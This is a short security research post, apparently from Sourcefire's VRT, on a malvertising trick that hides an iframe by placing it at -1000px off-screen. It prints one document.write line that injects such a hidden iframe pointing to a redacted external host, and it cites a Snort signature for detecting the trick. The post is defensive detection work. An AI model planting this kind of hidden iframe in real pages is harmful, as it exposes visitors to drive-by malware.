The VRT has observed a recent malvertising campaign in the wild that puts a new spin on this old idea. Instead of specifiying size values so small that the iframe never renders, the technique being used here abuses the CSS positioning attributes, by specifying absolute values of -1,000 for both the "left" and "top" parameters. As the iframe is declared to be 6x10 pixels in size, the browser considers it to be so far off the edge of the screen that it never even attempts to render it for the user:
document.write("<iframe height="10" src="http://<redacted>.org/route.htm" style="left: -1000px; position: absolute; top: -1000px; z-index: 1;" width="6" ></iframe>");
Fortunately, this particular variant makes for an easy signature, as no legitimate iframes will ever be placed in such a ludicrous spot on the page; SID 23618 will do the job nicely. In the meantime, the VRT is continuing to follow new developments in iframe obfuscation, with an eye towards generically detecting malicious hidden iframes. As always, if you see something malicious on your network that we're not currently providing coverage for, please send us a sample at vrt at sourcefire dot com, so that our detection can be improved for you and for the entire Snort user base.